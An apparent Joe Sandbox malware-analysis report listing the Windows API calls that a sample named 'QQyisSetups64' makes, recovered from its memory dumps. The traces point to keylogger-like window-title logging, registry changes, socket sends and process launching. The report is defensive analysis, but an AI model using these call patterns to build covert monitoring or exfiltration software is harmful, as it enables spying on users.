                                                                                                                                                                                                                      • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                                                                                                                      • API String ID: 1254190970-1225219777
                                                                                                                                                                                                                      • Opcode ID: 39b588cded6fb802f6b9678920eb3083cd1928cb83964f40cefa8556d3f70f9f
                                                                                                                                                                                                                      • Instruction ID: 682e2cc47d2f30c2c06baaedc11f503ad6d26ec3a692a06749c9796de89d5295
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39b588cded6fb802f6b9678920eb3083cd1928cb83964f40cefa8556d3f70f9f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6961A1F1548340AFD760EF68DC84EABB7E9BBC9614F104A1DF19987281E7349944CBA3
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0378C889
                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?), ref: 0378C894
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0378C8A4
                                                                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0378C8C3
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0378C8D1
                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0378C8E4
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0378C8F2
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0378C900
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                                                                                                                      • String ID: AppEvents$Network
                                                                                                                                                                                                                      • API String ID: 3935456190-3733486940
                                                                                                                                                                                                                      • Opcode ID: fe9157b0c32a62a35c3362da442f71d00ce4b652281bdc199f1b414edcf7cb63
                                                                                                                                                                                                                      • Instruction ID: 3b321db12ef3e178a29c0c5d3aa6f44d0c7a8c477013f4445dcafa8b9d387f41
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe9157b0c32a62a35c3362da442f71d00ce4b652281bdc199f1b414edcf7cb63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C116075B40608FBE724EBA8DC89FABB36CEB85610F104559FA0197241D6759E00E7B4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1873853019-0
                                                                                                                                                                                                                      • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                                      • Instruction ID: b8bb84f561a655fa35b638bf147191cc1fba597fd115efbab33452bebd6f23c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2281C6B9940300ABE728EB64DC86F6B7764AF55310F184168ED195F3C2EB71E910C6EA
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,5C2D3487), ref: 02C85A65
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85B04
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B42
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B67
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85C5F
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C85C80
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85B8C
                                                                                                                                                                                                                        • Part of subcall function 02C81280: __CxxThrowException@8.LIBCMT ref: 02C81290
                                                                                                                                                                                                                        • Part of subcall function 02C81280: DeleteCriticalSection.KERNEL32(00000000,?,02C97E78), ref: 02C812A1
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C85CF1
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C85CF7
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C85D0B
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C85D14
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                                                                      • Opcode ID: 1c19386567c2ccebf9d8763f0284a8b0d054d47aa0452e63ef39902de7fd72f9
                                                                                                                                                                                                                      • Instruction ID: c43ed6e611fb87a388c932eaf9476b3d0cc6625e7eb6c32b8531b28224a507ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c19386567c2ccebf9d8763f0284a8b0d054d47aa0452e63ef39902de7fd72f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1A1F7B0A41A46AFD714DF6AC88479AFBE8FB08344F90862ED11DC7640D774A964CFD0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,453DC9E3,?,?,?,?,00000000,000000FF,00000000), ref: 03784CE6
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,453DC9E3,?,?,?,?,00000000,000000FF,00000000), ref: 03784D0D
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03784D21
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03784D28
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                                                                      • Opcode ID: a2398bb0d627ef435cd355743b5f3073ead8fd6181d867bb98628f2d9efd4e8d
                                                                                                                                                                                                                      • Instruction ID: 071d1776fa185893cff32e348a82fa03c94c6039f6363f49376f227dda1220ea
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2398bb0d627ef435cd355743b5f3073ead8fd6181d867bb98628f2d9efd4e8d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5751E176A44705CFC324EFA9E484A6AF7F4FB88710F008A6EE90AD7780D775A800CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,5C2D3487,?,?,?,?,00000000,000000FF,00000000), ref: 02C84CC6
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,5C2D3487,?,?,?,?,00000000,000000FF,00000000), ref: 02C84CED
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C84D01
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C84D08
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                                                                      • Opcode ID: ff8f0869f3e7de5a2537e9c50bf6993230bb5d0843f6bde3c1edc909d659f684
                                                                                                                                                                                                                      • Instruction ID: b09c07930843b9e75320ebae1f73fd039b68c1eead1a31673372078f207881ef
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff8f0869f3e7de5a2537e9c50bf6993230bb5d0843f6bde3c1edc909d659f684
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D051C076A04601DFC325EFA8D989B6AF7F5FF48714F108A2EE50A87740E735A414CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_wcsrchr
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 170005318-2746444292
                                                                                                                                                                                                                      • Opcode ID: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                                                                                                                                      • Instruction ID: 6b6761cdb3ac15f043e6ccf4188fdf819de252a054af0bd0502b3ea3173444d4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6fa0b72b56112bd3c35845102393e6f1842eb526f784eef978a12b58a365560
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB51297594031C7ADB24EBA0CD86FEBB778DF14700F444599A609AB0C0EB709694CFA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378E751
                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,771B23A0,00000000), ref: 0378E759
                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,037B16F0,00000800), ref: 0378E76F
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378E78D
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(037B16F0,?,?,?,?,771B23A0,00000000), ref: 0378E7AC
                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,771B23A0,00000000), ref: 0378E7BD
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378E804
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6BD
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: CreateFileW.KERNEL32(037B0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0378E815,?,?,?,?,771B23A0,00000000), ref: 0378E6D7
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0378E6F2
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0378E6FF
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0378E70A
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: CloseHandle.KERNEL32(00000000), ref: 0378E711
                                                                                                                                                                                                                        • Part of subcall function 0378E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0378E71E
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378E820
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                                                                                                                      • String ID: [
                                                                                                                                                                                                                      • API String ID: 2192163267-4056885943
                                                                                                                                                                                                                      • Opcode ID: b27152c1a289bf68197c9b6d61b7b7e2fef44bff6cffcc086984e1bbef2bad76
                                                                                                                                                                                                                      • Instruction ID: fd153200d39cba70930bbe731a1c52e9b0dd8e6c9742fa49ecd7692146cf4ea3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b27152c1a289bf68197c9b6d61b7b7e2fef44bff6cffcc086984e1bbef2bad76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B521E5B5A40218AAD760EF54DC05FBAB3BCFF44704F44C299F984A6181EE785985CFE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03615703
                                                                                                                                                                                                                        • Part of subcall function 0361881A: __mtinitlocknum.LIBCMT ref: 03618830
                                                                                                                                                                                                                        • Part of subcall function 0361881A: __amsg_exit.LIBCMT ref: 0361883C
                                                                                                                                                                                                                      • ____lc_codepage_func.LIBCMT ref: 0361574A
                                                                                                                                                                                                                        • Part of subcall function 0361AAD7: __getptd.LIBCMT ref: 0361AAD7
                                                                                                                                                                                                                      • __getenv_helper_nolock.LIBCMT ref: 0361576C
                                                                                                                                                                                                                      • _free.LIBCMT ref: 036157A3
                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 036157AA
                                                                                                                                                                                                                      • __malloc_crt.LIBCMT ref: 036157B1
                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 036157C7
                                                                                                                                                                                                                      • _strcpy_s.LIBCMT ref: 036157D5
                                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 036157EA
                                                                                                                                                                                                                      • _free.LIBCMT ref: 036157F9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free_strlen$____lc_codepage_func__amsg_exit__getenv_helper_nolock__getptd__invoke_watson__lock__malloc_crt__mtinitlocknum_strcpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2128035972-0
                                                                                                                                                                                                                      • Opcode ID: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                                                                                                                                      • Instruction ID: 441da171bbf46a66127307604a44163bfae596da7292226604a98f3594d32835
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b058308d4fdfef1940e42f11e5b45edf41e2775cf3bd2bfbd0d08efe9f8df519
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5691E475C013999FDB11DFA9CD819ADFBB9FF86210B2C046EE641AB250D7308961CB15
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783E05
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783E50
                                                                                                                                                                                                                      • send.WS2_32(?,000000FF,00000000,00000000), ref: 03783E6E
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 03783E81
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03783E94
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EBC
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EC7
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,0378398D,?,00000000,000000FF,00000000), ref: 03783EDB
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03783F14
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,?), ref: 03783F51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1701177279-0
                                                                                                                                                                                                                      • Opcode ID: f0cf0706f7ff91ffdeaf7274a29f935a457f3346436b052ac118854417830203
                                                                                                                                                                                                                      • Instruction ID: 5f1a9accc9ded44e81b851da3542880e3a83b5d722a5d29619654f465b369c4e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0cf0706f7ff91ffdeaf7274a29f935a457f3346436b052ac118854417830203
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15412679144A049FE724EF78D888AA7B7F8EB49700F45896EE86ECB245D735A4018B60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03784F63
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03784F78
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 03784F8A
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03784F91
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 03784FBF
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 03784FE7
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03785025
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 03785031
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 03785038
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 0378504B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                                                                      • Opcode ID: 8e9c8d8587803b05d55edbd89a5c9b284922feaadee38215a6d626f2f30674f0
                                                                                                                                                                                                                      • Instruction ID: 1afbb6227d3cd3aa340b0e88f7188c99dc97813590618d5ad2b83428baf7402c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e9c8d8587803b05d55edbd89a5c9b284922feaadee38215a6d626f2f30674f0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D341D531640705DFD720FF7AD548A6AB7E9FB88314F08899DE84AC7641E775E4418B40
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02C84F43
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02C84F58
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(00002746), ref: 02C84F6A
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C84F71
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C84F9F
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C84FC7
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 02C85005
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02C85011
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C85018
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(000002FF), ref: 02C8502B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1979691958-0
                                                                                                                                                                                                                      • Opcode ID: d476bfc1fe01da997c65fbe6585ddc64bdf135235d639ca9b9220a2554bc33b1
                                                                                                                                                                                                                      • Instruction ID: f612f22247ee44687cff2b522c08026f0c055189f9b350ec2a562769ba693d8c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d476bfc1fe01da997c65fbe6585ddc64bdf135235d639ca9b9220a2554bc33b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16411531A002019FD730EF68D948B6AB7F9FF88318F40CA5DE54ACB241E776E9508B81
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378C2AE
                                                                                                                                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 0378C2CC
                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0378C309
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0378C314
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0378C321
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 0378C345
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseCreateHandleWrite_memsetlstrlenwsprintf
                                                                                                                                                                                                                      • String ID: %s %s
                                                                                                                                                                                                                      • API String ID: 1326869720-2939940506
                                                                                                                                                                                                                      • Opcode ID: 5be25f5cf802eeb7b6f9549197d8e07fc09f792b8d85bbd2518d86705b4e863d
                                                                                                                                                                                                                      • Instruction ID: 32bd9dbe9f39c41be996a87730f99ae294a0186ad0ea5dcde7c98a6f7f7702b6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be25f5cf802eeb7b6f9549197d8e07fc09f792b8d85bbd2518d86705b4e863d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D31A432680618AFDB24EB64DC85FEFB378EB49311F40469AFA05A61C1DA345A44CFA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0378C98D
                                                                                                                                                                                                                      • _wcsrchr.LIBCMT ref: 0378C9C7
                                                                                                                                                                                                                        • Part of subcall function 03787C80: LoadLibraryW.KERNEL32(wininet.dll), ref: 03787CC3
                                                                                                                                                                                                                        • Part of subcall function 03787C80: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03787CD7
                                                                                                                                                                                                                        • Part of subcall function 03787C80: FreeLibrary.KERNEL32(00000000), ref: 03787CF7
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(-00000002), ref: 0378C9E6
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0378C9F1
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378CA04
                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0378CA31
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memset_wcsrchrlstrlen
                                                                                                                                                                                                                      • String ID: D$WinSta0\Default
                                                                                                                                                                                                                      • API String ID: 174883095-1101385590
                                                                                                                                                                                                                      • Opcode ID: e6f9eb0fab6cfb8bd2d11a254deb9c9e8556061e8f2ae0e09de9249f89460f4c
                                                                                                                                                                                                                      • Instruction ID: 71174b8d05d37a5870b373bb65adefdc22d1dd6904a535ac4a313b9f248dc8e3
